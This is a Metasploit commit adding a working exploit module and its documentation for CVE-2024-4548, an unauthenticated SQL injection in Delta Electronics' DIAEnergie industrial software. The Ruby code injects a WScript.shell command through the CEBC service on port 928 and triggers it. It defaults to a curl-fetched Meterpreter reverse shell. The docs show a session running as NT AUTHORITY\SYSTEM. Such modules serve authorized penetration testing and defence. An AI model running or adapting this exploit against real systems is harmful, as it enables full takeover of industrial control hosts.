Land rapid7#19351, DIAEnergie SQL Injection

dledda-r7 · dledda-r7 · commit 35da4662ed40 · 2024-08-21T09:44:15.000-04:00
diff --git a/documentation/modules/exploit/windows/scada/diaenergie_sqli.md b/documentation/modules/exploit/windows/scada/diaenergie_sqli.md
@@ -0,0 +1,68 @@
+## Vulnerable Application
+
+**Vulnerability Description**
+
+This module exploits a SQL injection vulnerability in DIAEnergie <= v8.28.0 (CVE-2024-4548).
+
+An unauthenticated remote attacker can exploit this vulnerability to inject an arbitrary script through a SQL injection vulnerability, which
+can then be executed in the context of `NT AUTHORITY\SYSTEM`. The vulnerability is within the CEBC service, which listens by default on TCP
+port 928. It accepts various user-controlled data, including `RecalculateHDMWYC` messages, which are insufficiently validated before using
+them as part of a SQL query.
+
+Versions <= 1.10.1.8610 are affected. Tenable published [TRA-2024-13](https://www.tenable.com/security/research/tra-2024-13) to cover the
+security issues.
+
+**Vulnerable Application Installation**
+
+A trial version of the software can be obtained from [the vendor]
+(https://downloadcenter.deltaww.com/downloadCenterCounter.aspx?DID=39969&DocPath=1&hl=en-US).
+For the product to work correctly, SQL Server (e.g., SQL Server Express) needs to be installed.
+
+**Successfully tested on**
+
+- DIAEnergie v1.10 on Windows 10 22H2
+- DIAEnergie v1.9 on Windows 10 22H2
+
+## Verification Steps
+
+1. Install the SQL Server (Express)
+2. Install DIAEnergie
+3. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use exploit/windows/scada/diaenergie_sqli
+[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/scada/diaenergie_sqli) > set RHOSTS <IP>
+msf6 exploit(windows/scada/diaenergie_sqli) > exploit
+```
+
+You should get a meterpreter session in the context of `NT AUTHORITY\SYSTEM`.
+
+## Scenarios
+
+Running the exploit against DIAEnergie v1.10 on Windows 10 22H2, using curl as a fetch command, should result in an output similar to the
+following:
+
+```
+msf6 exploit(windows/scada/diaenergie_sqli) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.241:4444 
+[*] 192.168.1.245:928 - Running automatic check ("set AutoCheck false" to disable)
+[+] 192.168.1.245:928 - The target appears to be vulnerable.
+[*] 192.168.1.245:928 - Sending SQL injection...
+[*] 192.168.1.245:928 - Triggering script execution...
+[*] 192.168.1.245:928 - Cleaning up database...
+[+] 192.168.1.245:928 - Script successfully injected, check thy shell.
+[*] Sending stage (201798 bytes) to 192.168.1.245
+[*] Meterpreter session 1 opened (192.168.1.241:4444 -> 192.168.1.245:50605) at 2024-07-29 23:59:53 -0400
+
+meterpreter > shell
+Process 6392 created.
+Channel 1 created.
+Microsoft Windows [Version 10.0.19045.4529]
+(c) Microsoft Corporation. All rights reserved.
+
+C:\WINDOWS\system32>whoami
+whoami
+nt authority\system
+```
diff --git a/modules/exploits/windows/scada/diaenergie_sqli.rb b/modules/exploits/windows/scada/diaenergie_sqli.rb
@@ -0,0 +1,154 @@
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::Tcp
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'DIAEnergie SQL Injection (CVE-2024-4548)',
+        'Description' => %q{
+          SQL injection vulnerability in DIAEnergie <= v1.10 from Delta Electronics.
+          This vulnerability can be exploited by an unauthenticated remote attacker to gain arbitrary code execution through a SQL injection vulnerability in the CEBC service. The commands will get executed in the context of NT AUTHORITY\SYSTEM.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Michael Heinzl', # MSF exploit
+          'Tenable' # Discovery & PoC
+        ],
+        'References' => [
+          [ 'URL', 'https://www.tenable.com/security/research/tra-2024-13'],
+          [ 'CVE', '2024-4548']
+        ],
+        'DisclosureDate' => '2024-05-06',
+        'Platform' => 'win',
+        'Arch' => [ ARCH_CMD ],
+        'Targets' => [
+          [
+            'Windows_Fetch',
+            {
+              'Arch' => [ ARCH_CMD ],
+              'Platform' => 'win',
+              'DefaultOptions' => {
+                'FETCH_COMMAND' => 'CURL',
+                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp'
+              },
+              'Type' => :win_fetch
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(928)
+      ]
+    )
+  end
+
+  # Determine if the DIAEnergie version is vulnerable
+  def check
+    begin
+      connect
+      sock.put 'Who is it?'
+      res = sock.get || ''
+    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
+      vprint_error(e.message)
+      return Exploit::CheckCode::Unknown
+    ensure
+      disconnect
+    end
+
+    if res.empty?
+      vprint_status('Received an empty response.')
+      return Exploit::CheckCode::Unknown
+    end
+
+    vprint_status('Who is it response: ' + res.to_s)
+    version_pattern = /\b\d+\.\d+\.\d+\.\d+\b/
+    version = res.match(version_pattern)
+
+    if version[0].nil?
+      Exploit::CheckCode::Detected
+    end
+
+    vprint_status('Version retrieved: ' + version[0])
+
+    unless Rex::Version.new(version) <= Rex::Version.new('1.10.1.8610')
+      return CheckCode::Safe
+    end
+
+    return CheckCode::Appears
+  end
+
+  def exploit
+    execute_command(payload.encoded)
+  end
+
+  def execute_command(cmd)
+    scname = Rex::Text.rand_text_alphanumeric(5..10).to_s
+    vprint_status('Using random script name: ' + scname)
+
+    year = rand(2024..2026)
+    month = sprintf('%02d', rand(1..12))
+    day = sprintf('%02d', rand(1..29))
+    random_date = "#{year}-#{month}-#{day}"
+    vprint_status('Using random date: ' + random_date)
+
+    hour = sprintf('%02d', rand(0..23))
+    minute = sprintf('%02d', rand(0..59))
+    second = sprintf('%02d', rand(0..59))
+    random_time = "#{hour}:#{minute}:#{second}"
+    vprint_status('Using random time: ' + random_time)
+
+    # Inject payload
+    begin
+      print_status('Sending SQL injection...')
+      connect
+      vprint_status("RecalculateHDMWYC~#{random_date} #{random_time}~#{random_date} #{random_time}~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N'#{scname}', N'CreateObject(\"WScript.shell\").run(\"cmd /c #{cmd}\")', N'', N'');--")
+      sock.put "RecalculateHDMWYC~#{random_date} #{random_time}~#{random_date} #{random_time}~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N'#{scname}', N'CreateObject(\"WScript.shell\").run(\"cmd /c #{cmd}\")', N'', N'');--"
+      res = sock.get
+      unless res.to_s == 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.'
+        fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server received: ' + res.to_s)
+      end
+
+      vprint_status('Injection - Expected response received: ' + res.to_s)
+      disconnect
+
+      # Trigger
+      print_status('Triggering script execution...')
+      connect
+      sock.put "RecalculateScript~#{random_date} #{random_time}~#{random_date} #{random_time}~1"
+      res = sock.get
+      unless res.to_s == 'Recalculate Script Start!'
+        fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server received: ' + res.to_s)
+      end
+      vprint_status('Trigger - Expected response received: ' + res.to_s)
+
+      disconnect
+
+      print_good('Script successfully injected, check thy shell.')
+    ensure
+      # Cleanup
+      print_status('Cleaning up database...')
+      connect
+      sock.put "RecalculateHDMWYC~2024-02-04 00:00:00~2024-02-05 00:00:00~1);DELETE FROM DIAEnergie.dbo.DIAE_script WHERE name='#{scname}';--"
+      res = sock.get
+      unless res.to_s == 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.'
+        fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server received: ' + res.to_s)
+      end
+      vprint_status('Cleanup - Expected response received: ' + res.to_s)
+
+      disconnect
+    end
+  end
+end
